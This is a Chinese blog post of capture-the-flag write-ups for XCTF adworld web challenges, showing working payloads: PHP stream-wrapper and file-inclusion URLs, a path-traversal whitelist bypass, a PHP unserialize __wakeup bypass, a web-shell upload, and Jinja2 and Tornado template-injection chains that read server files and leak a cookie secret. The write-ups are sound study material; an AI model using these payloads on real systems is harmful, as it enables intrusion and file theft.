

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/feiji.png">
  <link rel="icon" type="image/png" href="/img/feiji.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="sunzy">
  <meta name="keywords" content="">
  <title>adworld - 一路走到黑</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/a11y-light.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Sunzy'blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://i.loli.net/2020/10/24/eBR35xZYEbuzSW9.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-30 10:45" pubdate>
        2020年11月30日 上午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      70
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">adworld</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：24 分钟前
                
              </p>
            
            <div class="markdown-body" id="post-body">
              <p>为了完成网安作业必须多做点题，顺便写wp</p>
<a id="more"></a>

<h2 id="Web-php-include"><a href="#Web-php-include" class="headerlink" title="Web_php_include"></a>Web_php_include</h2><p>利用php伪协议上传一段php代码后执行，列出目录看到flag文件</p>
<p><img src="https://i.loli.net/2020/12/04/ApRxaQX5nhbdD87.png" srcset="/img/loading.gif" alt="image-20201204225248794"></p>
<p>再利用本地文件包含读取flag</p>
<div class="hljs"><pre><code class="hljs apache"><span class="hljs-attribute">http</span>://220.249.52.133:46457/?page=http://127.0.0.1/index.php/?hello=<span class="hljs-number">%3</span>C?show_source(<span class="hljs-number">%22</span>fl4gisisish3r3.php<span class="hljs-number">%22</span>);?<span class="hljs-number">%3</span>E</code></pre></div>





<h2 id="warmup"><a href="#warmup" class="headerlink" title="warmup"></a>warmup</h2><p>查看源码看到source.php，访问看到源码</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
    highlight_file(<span class="hljs-keyword">__FILE__</span>);
    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">emmm</span></span>
<span class="hljs-class">    </span>&#123;
        <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">checkFile</span><span class="hljs-params">(&amp;$page)</span></span>
<span class="hljs-function">        </span>&#123;
            $whitelist = [<span class="hljs-string">"source"</span>=&gt;<span class="hljs-string">"source.php"</span>,<span class="hljs-string">"hint"</span>=&gt;<span class="hljs-string">"hint.php"</span>];
            <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">isset</span>($page) || !is_string($page)) &#123;
                <span class="hljs-keyword">echo</span> <span class="hljs-string">"you can't see it"</span>;
                <span class="hljs-keyword">return</span> <span class="hljs-keyword">false</span>;
            &#125;

            <span class="hljs-keyword">if</span> (in_array($page, $whitelist)) &#123;
                <span class="hljs-keyword">return</span> <span class="hljs-keyword">true</span>;
            &#125;

            $_page = mb_substr(
                $page,
                <span class="hljs-number">0</span>,
                mb_strpos($page . <span class="hljs-string">'?'</span>, <span class="hljs-string">'?'</span>)
            );
            <span class="hljs-keyword">if</span> (in_array($_page, $whitelist)) &#123;
                <span class="hljs-keyword">return</span> <span class="hljs-keyword">true</span>;
            &#125;

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                <span class="hljs-number">0</span>,
                mb_strpos($_page . <span class="hljs-string">'?'</span>, <span class="hljs-string">'?'</span>)
            );
            <span class="hljs-keyword">if</span> (in_array($_page, $whitelist)) &#123;
                <span class="hljs-keyword">return</span> <span class="hljs-keyword">true</span>;
            &#125;
            <span class="hljs-keyword">echo</span> <span class="hljs-string">"you can't see it"</span>;
            <span class="hljs-keyword">return</span> <span class="hljs-keyword">false</span>;
        &#125;
    &#125;

    <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">empty</span>($_REQUEST[<span class="hljs-string">'file'</span>])
        &amp;&amp; is_string($_REQUEST[<span class="hljs-string">'file'</span>])
        &amp;&amp; emmm::checkFile($_REQUEST[<span class="hljs-string">'file'</span>])
    ) &#123;
        <span class="hljs-keyword">include</span> $_REQUEST[<span class="hljs-string">'file'</span>];
        <span class="hljs-keyword">exit</span>;
    &#125; <span class="hljs-keyword">else</span> &#123;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"&lt;br&gt;&lt;img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" /&gt;"</span>;
    &#125;  
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>源码中有一个hint.php，查看得到</p>
<div class="hljs"><pre><code class="hljs smali">flag<span class="hljs-built_in"> not </span>here,<span class="hljs-built_in"> and </span>flag in ffffllllaaaagggg</code></pre></div>

<p>访问 <code>ffffllllaaaagggg</code>，发现没有这个文件，所以可能是在根目录。</p>
<p>继续看代码有个白名单</p>
<div class="hljs"><pre><code class="hljs css"><span class="hljs-selector-tag">source</span><span class="hljs-selector-class">.php</span>,<span class="hljs-selector-tag">hint</span><span class="hljs-selector-class">.php</span></code></pre></div>

<p>mb_substr函数会截取<code>?</code>前面的字符返回给page，检测其是否在白名单中</p>
<p>注意这里有一个urldecode()，所以提交前需要进行两次urlencode</p>
<p>解码后重复上面两步</p>
<div class="hljs"><pre><code class="hljs php">$_page = mb_substr($_page,<span class="hljs-number">0</span>,mb_strpos($_page . <span class="hljs-string">'?'</span>, <span class="hljs-string">'?'</span>));
<span class="hljs-keyword">if</span> (in_array($_page, $whitelist)) &#123;
   <span class="hljs-keyword">return</span> <span class="hljs-keyword">true</span>;
&#125;</code></pre></div>

<p>之后通过include函数获取flag</p>
<p>所以构造的payload中url解码后?前的内容必须是  <code>source.php</code>或者<code>hint.php</code></p>
<p>payload:</p>
<div class="hljs"><pre><code class="hljs awk">GET:
?page=hint.php%<span class="hljs-number">253</span>F<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>ffffllllaaaagggg</code></pre></div>

<p>原理是<code>hint.php?/</code>被当作目录</p>
<p>../是返回上一级目录，这里多几个../也没事，必须保证返回到根目录，而在根目录向上返回还是根目录。</p>
<p>所以上面的payload可以在根目录读取到flag。</p>
<h2 id="NaNNaNNaNNaN-Batman"><a href="#NaNNaNNaNNaN-Batman" class="headerlink" title="NaNNaNNaNNaN-Batman"></a>NaNNaNNaNNaN-Batman</h2><p>下载附件打开后显示有乱码，但是可以看到<code>&lt;script&gt;</code>标签，于是改后缀伪html ,在浏览器打开，出现一个输入框。</p>
<p>继续看代码，看到函数的最后有个<code>eval</code>函数，中间的参数为eval(_)，正好与开头定义的名相同<code>&lt;script&gt;_=&#39;function</code>，所以想办法把原函数显示处理</p>
<p>将eval改为alert，保存后在浏览器中打开看到弹框中出现源码。</p>
<p>在线格式化后的结果</p>
<div class="hljs"><pre><code class="hljs js"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">$</span>(<span class="hljs-params"></span>) </span>&#123;
    <span class="hljs-keyword">var</span> e = <span class="hljs-built_in">document</span>.getElementById(<span class="hljs-string">"c"</span>).value;
    <span class="hljs-keyword">if</span> (e.length == <span class="hljs-number">16</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/^be0f23/</span>) != <span class="hljs-literal">null</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/233ac/</span>) != <span class="hljs-literal">null</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/e98aa$/</span>) != <span class="hljs-literal">null</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/c7be9/</span>) != <span class="hljs-literal">null</span>) &#123;
        <span class="hljs-keyword">var</span> t = [<span class="hljs-string">"fl"</span>, <span class="hljs-string">"s_a"</span>, <span class="hljs-string">"i"</span>, <span class="hljs-string">"e&#125;"</span>];
        <span class="hljs-keyword">var</span> n = [<span class="hljs-string">"a"</span>, <span class="hljs-string">"_h0l"</span>, <span class="hljs-string">"n"</span>];
        <span class="hljs-keyword">var</span> r = [<span class="hljs-string">"g&#123;"</span>, <span class="hljs-string">"e"</span>, <span class="hljs-string">"_0"</span>];
        <span class="hljs-keyword">var</span> i = [<span class="hljs-string">"it'"</span>, <span class="hljs-string">"_"</span>, <span class="hljs-string">"n"</span>];
        <span class="hljs-keyword">var</span> s = [t, n, r, i];
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> o = <span class="hljs-number">0</span>; o &lt; <span class="hljs-number">13</span>; ++o) &#123;
            <span class="hljs-built_in">document</span>.write(s[o % <span class="hljs-number">4</span>][<span class="hljs-number">0</span>]);
            s[o % <span class="hljs-number">4</span>].splice(<span class="hljs-number">0</span>, <span class="hljs-number">1</span>)
        &#125;
    &#125;
&#125;
<span class="hljs-built_in">document</span>.write(<span class="hljs-string">'&lt;input id="c"&gt;&lt;button onclick=$()&gt;Ok&lt;/button&gt;'</span>);
<span class="hljs-keyword">delete</span> _</code></pre></div>

<p>再看这段js代码中的if语句</p>
<div class="hljs"><pre><code class="hljs js"><span class="hljs-keyword">if</span> (e.length == <span class="hljs-number">16</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/^be0f23/</span>) != <span class="hljs-literal">null</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/233ac/</span>) != <span class="hljs-literal">null</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/e98aa$/</span>) != <span class="hljs-literal">null</span>) <span class="hljs-keyword">if</span> (e.match(<span class="hljs-regexp">/c7be9/</span>) != <span class="hljs-literal">null</span>)</code></pre></div>

<p>参数e的长度为16，其中要包含</p>
<div class="hljs"><pre><code class="hljs angelscript">be0f23开头  <span class="hljs-number">233</span>ac   e98aa结尾     c7be9</code></pre></div>

<p>通过if语句后会通过一个算法将flag算出来</p>
<p>ok,那就按if语句的要求写出e</p>
<div class="hljs"><pre><code class="hljs plain">be0f233ac7be98aa</code></pre></div>

<p>还可以直接利用</p>
<div class="hljs"><pre><code class="hljs js"><span class="hljs-keyword">var</span> t = [<span class="hljs-string">"fl"</span>, <span class="hljs-string">"s_a"</span>, <span class="hljs-string">"i"</span>, <span class="hljs-string">"e&#125;"</span>];
      <span class="hljs-keyword">var</span> n = [<span class="hljs-string">"a"</span>, <span class="hljs-string">"_h0l"</span>, <span class="hljs-string">"n"</span>];
      <span class="hljs-keyword">var</span> r = [<span class="hljs-string">"g&#123;"</span>, <span class="hljs-string">"e"</span>, <span class="hljs-string">"_0"</span>];
      <span class="hljs-keyword">var</span> i = [<span class="hljs-string">"it'"</span>, <span class="hljs-string">"_"</span>, <span class="hljs-string">"n"</span>];
      <span class="hljs-keyword">var</span> s = [t, n, r, i];
      <span class="hljs-keyword">for</span> (<span class="hljs-keyword">var</span> o = <span class="hljs-number">0</span>; o &lt; <span class="hljs-number">13</span>; ++o) &#123;
          <span class="hljs-built_in">document</span>.write(s[o % <span class="hljs-number">4</span>][<span class="hljs-number">0</span>]);
          s[o % <span class="hljs-number">4</span>].splice(<span class="hljs-number">0</span>, <span class="hljs-number">1</span>)
      &#125;</code></pre></div>

<p>在浏览器的console中运行</p>
<p><img src="https://i.loli.net/2020/12/01/fA5vLyShNcro2Ow.png" srcset="/img/loading.gif" alt="image-20201201230236591"></p>
<h2 id="web2"><a href="#web2" class="headerlink" title="web2"></a>web2</h2><div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$miwen=<span class="hljs-string">"a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"</span>;

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">encode</span><span class="hljs-params">($str)</span></span>&#123;
    $_o=strrev($str);
    <span class="hljs-comment">// echo $_o;</span>
        
    <span class="hljs-keyword">for</span>($_0=<span class="hljs-number">0</span>;$_0&lt;strlen($_o);$_0++)&#123;
       
        $_c=substr($_o,$_0,<span class="hljs-number">1</span>);
        $__=ord($_c)+<span class="hljs-number">1</span>;
        $_c=chr($__);
        $_=$_.$_c;   
    &#125; 
    <span class="hljs-keyword">return</span> str_rot13(strrev(base64_encode($_)));
&#125;

highlight_file(<span class="hljs-keyword">__FILE__</span>);
<span class="hljs-comment">/*</span>
<span class="hljs-comment">   逆向加密算法，解密$miwen就是flag</span>
<span class="hljs-comment">*/</span>
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>了解几个函数的用法</p>
<blockquote>
<p>str_rot13() 函数对字符串执行 ROT13 编码。</p>
<p>ROT13 编码把每一个字母在字母表中向前移动 13 个字母。数字和非字母字符保持不变。</p>
<p><strong>提示：</strong>编码和解码都是由相同的函数完成的。如果您把已编码的字符串作为参数，那么将返回原始字符串。</p>
<p>strrev() 函数反转字符串。</p>
</blockquote>
<p><img src="https://i.loli.net/2020/12/01/LMmUQRWEsx8jceg.png" srcset="/img/loading.gif" alt="image-20201201232139218"></p>
<p>解密脚本</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$str = <span class="hljs-string">"a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"</span>;
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">decode</span><span class="hljs-params">($str)</span></span>&#123;
    $s = base64_decode(strrev(str_rot13($str)));
    <span class="hljs-comment">//echo($s);</span>
    <span class="hljs-keyword">for</span>($_0=<span class="hljs-number">0</span>;$_0&lt;strlen($s);$_0++)&#123;
        $_c=substr($s,$_0,<span class="hljs-number">1</span>);
        $__=ord($_c)<span class="hljs-number">-1</span>;
        $_c=chr($__);
        $_=$_.$_c;
    &#125;
    <span class="hljs-keyword">echo</span> strrev($_);
&#125;
decode($str);
<span class="hljs-meta">?&gt;</span></code></pre></div>



<h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><p>这题应该给个提示的，访问index.phps获取源码。</p>
<p>phps，用御剑和dirsearch都扫不出来，所以必须知道才可能做出来。</p>
<p>给新生赛出题的想法来源，当时做这题的时候费了好大劲才找到index.phps，所以也让让萌新们体验一下找不到的绝望🤣</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">if</span>(<span class="hljs-string">"admin"</span>===$_GET[id]) &#123;
  <span class="hljs-keyword">echo</span>(<span class="hljs-string">"&lt;p&gt;not allowed!&lt;/p&gt;"</span>);
  <span class="hljs-keyword">exit</span>();
&#125;

$_GET[id] = urldecode($_GET[id]);
<span class="hljs-keyword">if</span>($_GET[id] == <span class="hljs-string">"admin"</span>)
&#123;
  <span class="hljs-keyword">echo</span> <span class="hljs-string">"&lt;p&gt;Access granted!&lt;/p&gt;"</span>;
  <span class="hljs-keyword">echo</span> <span class="hljs-string">"&lt;p&gt;Key: xxxxxxx &lt;/p&gt;"</span>;
&#125;
<span class="hljs-meta">?&gt;</span>

Can you anthenticate to this website?</code></pre></div>



<p>获取id后urldecode之后再赋值给id，要注意上传的参数浏览器会字段一次urldecode，所以这里的admin需要两次urlencode</p>
<p>payload：</p>
<div class="hljs"><pre><code class="hljs xquery">admin
<span class="hljs-meta">%61</span><span class="hljs-meta">%64</span><span class="hljs-meta">%6D</span><span class="hljs-meta">%69</span><span class="hljs-meta">%6E</span>
<span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%31</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%34</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%44</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%39</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%45</span>
GET:
<span class="hljs-built_in">?id</span>=<span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%31</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%34</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%44</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%39</span><span class="hljs-meta">%25</span><span class="hljs-meta">%36</span><span class="hljs-meta">%45</span></code></pre></div>



<h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><p>很简单的unserialize</p>
<p>利用漏洞，当属性值大于真是属性值的时候会跳过wakeup函数，php版本小于5.6</p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">xctf</span></span>&#123;
<span class="hljs-keyword">public</span> $flag = <span class="hljs-string">'111'</span>;
<span class="hljs-comment">// public function __wakeup()&#123;</span>
<span class="hljs-comment">//     exit('bad requests');</span>
<span class="hljs-comment">// &#125;</span>
&#125;

$c = <span class="hljs-keyword">new</span> xctf();
<span class="hljs-keyword">echo</span>(serialize($c));
<span class="hljs-meta">?&gt;</span></code></pre></div>

<div class="hljs"><pre><code class="hljs groovy"><span class="hljs-string">O:</span><span class="hljs-number">4</span>:<span class="hljs-string">"xctf"</span>:<span class="hljs-number">1</span>:&#123;<span class="hljs-string">s:</span><span class="hljs-number">4</span>:<span class="hljs-string">"flag"</span>;<span class="hljs-string">s:</span><span class="hljs-number">3</span>:<span class="hljs-string">"111"</span>;&#125;

<span class="hljs-string">GET:</span>
?code=O:<span class="hljs-number">4</span>:<span class="hljs-string">"xctf"</span>:<span class="hljs-number">2</span>:&#123;<span class="hljs-string">s:</span><span class="hljs-number">4</span>:<span class="hljs-string">"flag"</span>;<span class="hljs-string">s:</span><span class="hljs-number">3</span>:<span class="hljs-string">"111"</span>;&#125;</code></pre></div>



<h2 id="upload1"><a href="#upload1" class="headerlink" title="upload1"></a>upload1</h2><p>抓包修改MIME为image/jpeg,即可上传成功，之后蚁剑连接拿到flag。</p>
<h2 id="Web-python-template-injection"><a href="#Web-python-template-injection" class="headerlink" title="Web_python_template_injection"></a>Web_python_template_injection</h2><p>模板注入，和cumtctf华为杯很像，但是没那个难。</p>
<p>首先判断是否存在模板注入，在url后输入 49，显示页面如下，可以确定存在模板注入，因为我们输入的值被其当作变量带入计算。</p>
<p><img src="https://i.loli.net/2020/12/02/NyPSIhg9Yv4Jbzp.png" srcset="/img/loading.gif" alt="20201202085851.png"></p>
<p>模板注入原理这篇博客写的很详细：<a href="https://xz.aliyun.com/t/3679" target="_blank" rel="noopener">https://xz.aliyun.com/t/3679</a></p>
<p>几个常用的魔术方法</p>
<blockquote>
<p>_<em>class_</em>  返回类型所属的对象 </p>
<p>_<em>mro_</em>    返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。</p>
<p> _<em>base_</em>   返回该对象所继承的基类 // <strong>base</strong>和<strong>mro</strong>都是用来寻找基类的 </p>
<p>_<em>subclasses_</em>   每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表 </p>
<p>_<em>init_</em>  类的初始化方法</p>
<p> _<em>globals_</em>  对包含函数全局变量的字典的引</p>
<p>直接开始这题</p>
</blockquote>
<p>1.查看所有模块，其中第41个模块file和72个模块，包含文件读取的相关操作，可以利用</p>
<div class="hljs"><pre><code class="hljs clojure">&#123;&#123;[].__class__.__base__.__subclasses__()&#125;&#125;</code></pre></div>



<p><img src="https://i.loli.net/2020/12/02/j9Ahcr8sOaSyEPt.png" srcset="/img/loading.gif" alt="image-20201202090652367"></p>
<p>2.列出文件目录</p>
<div class="hljs"><pre><code class="hljs clojure">&#123;&#123;''.__class__.__mro__[<span class="hljs-number">2</span>].__subclasses__()[<span class="hljs-number">71</span>].__init__.__globals__['os'].listdir(<span class="hljs-name">'.'</span>)&#125;&#125;</code></pre></div>



<p><img src="https://i.loli.net/2020/12/02/hSIWxNvpBwqe2Qt.png" srcset="/img/loading.gif" alt="image-20201202094836434"></p>
<p>3.读取flag</p>
<div class="hljs"><pre><code class="hljs markdown">''.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>[<span class="hljs-string">2</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">40</span>](<span class="hljs-link">'fl4g'</span>).read()</code></pre></div>

<p><img src="https://i.loli.net/2020/12/02/Qxdc9U1GbrzYvSg.png" srcset="/img/loading.gif" alt="image-20201202094926424"></p>
<h2 id="easytornado"><a href="#easytornado" class="headerlink" title="easytornado"></a>easytornado</h2><p><strong>Tornado</strong>全称<strong>Tornado Web Server</strong>，是一个用<a href="https://zh.m.wikipedia.org/wiki/Python" target="_blank" rel="noopener">Python</a>语言写成的<a href="https://zh.m.wikipedia.org/wiki/Web服务器" target="_blank" rel="noopener">Web服务器</a>兼<a href="https://zh.m.wikipedia.org/wiki/Web应用框架" target="_blank" rel="noopener">Web应用框架</a>，由FriendFeed公司在自己的网站<a href="https://zh.m.wikipedia.org/wiki/FriendFeed" target="_blank" rel="noopener">FriendFeed</a>中使用，被<a href="https://zh.m.wikipedia.org/wiki/Facebook" target="_blank" rel="noopener">Facebook</a>收购以后框架以<a href="https://zh.m.wikipedia.org/wiki/开源软件" target="_blank" rel="noopener">开源软件</a>形式开放给大众。</p>
<p>这又是web服务器和web应用框架，会不会和flask框架一样存在模板模板注入</p>
<h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a><strong>原理</strong></h3><p>tornado render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页，如果用户对render内容可控，不仅可以注入XSS代码，而且还可以通过{{}}进行传递变量和执行简单的表达式。</p>
<h3 id="解题"><a href="#解题" class="headerlink" title="解题"></a>解题</h3><p>1.先看看题目给的连接</p>
<div class="hljs"><pre><code class="hljs sas">http://220.249.52.133:43538/<span class="hljs-meta">file</span>?<span class="hljs-meta">filename</span>=/welcome.txt<span class="hljs-variable">&amp;filehash</span>=34b3f8fdcf2ec4394a5b9b20580c0096</code></pre></div>

<p>提交的参数是文件名和文件的hash值</p>
<p>并且给了三web页面</p>
<div class="hljs"><pre><code class="hljs jboss-cli"><span class="hljs-string">/flag.txt</span>
<span class="hljs-string">/welcome.txt</span>
<span class="hljs-string">/hints.txt</span></code></pre></div>

<p>flag.txt</p>
<div class="hljs"><pre><code class="hljs jboss-cli">flag in <span class="hljs-string">/fllllllllllllag</span></code></pre></div>

<p>hints.txt给的提示</p>
<div class="hljs"><pre><code class="hljs stylus">/hints.txt
<span class="hljs-function"><span class="hljs-title">md5</span><span class="hljs-params">(cookie_secret+md5(filename)</span></span>)</code></pre></div>

<p>这就知道了<code>filehash</code>的来源了</p>
<p>2.读取flag.txt就必须构造payload：</p>
<div class="hljs"><pre><code class="hljs awk"><span class="hljs-regexp">//</span>?filename=<span class="hljs-regexp">/fllllllllllllag&amp;filehash=md5(cookie_secret+md5(/</span>fllllllllllllag))</code></pre></div>

<p>但是我们不知道cookie_secret 的值，先提交试试</p>
<p><img src="https://i.loli.net/2020/12/02/7GzhFyxqJT9ZwNH.png" srcset="/img/loading.gif" alt="image-20201202100637168"></p>
<p>出现了这个错误页面，并且我们可以控制msg的值，存在模板注入</p>
<p>3.输入<code>msg={{handler.settings}}</code>,获取当前的环境变量，得到cookie_sercet的值 </p>
<p><img src="https://i.loli.net/2020/12/02/CijHGvlO7Pft8ur.png" srcset="/img/loading.gif" alt="image-20201202101520762"></p>
<div class="hljs"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$filename = md5(<span class="hljs-string">'/fllllllllllllag'</span>);
$s = <span class="hljs-string">'cb82b218-07e3-491d-a302-532dbae27e6a'</span>;
<span class="hljs-keyword">echo</span> md5($s.$filename);
<span class="hljs-meta">?&gt;</span></code></pre></div>

<p>于是构造出payload</p>
<div class="hljs"><pre><code class="hljs routeros">
?<span class="hljs-attribute">filename</span>=/fllllllllllllag&amp;filehash=0caf8cf587a036fabea3fa65f058c275</code></pre></div>

<p>拿到flag</p>
<p>参考:<a href="https://www.cnblogs.com/cimuhuashuimu/p/11544455.html" target="_blank" rel="noopener">https://www.cnblogs.com/cimuhuashuimu/p/11544455.html</a></p>
<h2 id="shrine"><a href="#shrine" class="headerlink" title="shrine"></a>shrine</h2><div class="hljs"><pre><code class="hljs php">import flask
import os

app = flask.Flask(__name__)
app.config[<span class="hljs-string">'FLAG'</span>] = os.environ.pop(<span class="hljs-string">'FLAG'</span>)


@app.route(<span class="hljs-string">'/'</span>)
def index():
    <span class="hljs-keyword">return</span> open(<span class="hljs-keyword">__file__</span>).read()

@app.route(<span class="hljs-string">'/shrine/&lt;path:shrine&gt;'</span>)
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace(<span class="hljs-string">'('</span>, <span class="hljs-string">''</span>).replace(<span class="hljs-string">')'</span>, <span class="hljs-string">''</span>)
        blacklist = [<span class="hljs-string">'config'</span>, <span class="hljs-string">'self'</span>]
        <span class="hljs-keyword">return</span> <span class="hljs-string">''</span>.join([<span class="hljs-string">'&#123;&#123;% set &#123;&#125;=None%&#125;&#125;'</span>.format(c) <span class="hljs-keyword">for</span> c in blacklist]) + s

    <span class="hljs-keyword">return</span> flask.render_template_string(safe_jinja(shrine))


<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    app.run(debug=<span class="hljs-keyword">True</span>)</code></pre></div>

<h3 id="考察点"><a href="#考察点" class="headerlink" title="考察点"></a>考察点</h3><p>很明显的flask框架</p>
<p>存在模板注入，但是对()进行了过滤，并将config , self 加入了黑名单，<code>Web_python_template_injection</code>这题的payload就没法用了。</p>
<p><img src="https://i.loli.net/2020/12/02/JT7Wnk3u86IVHQe.png" srcset="/img/loading.gif" alt="image-20201202103810281"></p>
